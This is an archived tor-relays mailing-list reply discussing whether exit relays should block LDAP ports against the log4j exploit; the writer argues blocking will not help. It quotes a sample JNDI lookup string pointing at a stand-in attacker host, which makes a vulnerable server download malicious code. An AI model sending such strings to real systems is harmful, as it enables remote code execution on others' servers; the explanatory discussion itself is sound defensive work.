[Author Prev][Author Next][Thread Prev][Thread Next][Author Index][Thread Index]

Re: [tor-relays] Mitigating log4j exploits



Hey,

Am 11.12.2021 13:51, schrieb Jens Kubieziel:
attacks. One possibility is, in my opinion, rejecting connection over
ports 389 and 636. What do you think? Should we as exit node operators
block connections over those LDAP ports for some amount of time?

don't think this is going to help.

The exploit works like this: Send a special string that *references* an ldap server (most used right now, though other protocols are possible), such as "${jndi:ldap://attacker.example.com:port/a}";. The target then contacts the ldap server and essentially downloads the malicious code from there. You can include a custom port as shown and many attackers do. Most exploit attempts use http(s). Nothing we can block without packet inspection.


Best regards,
Felix
_______________________________________________
tor-relays mailing list
tor-relays@xxxxxxxxxxxxxxxxxxxx
https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-relays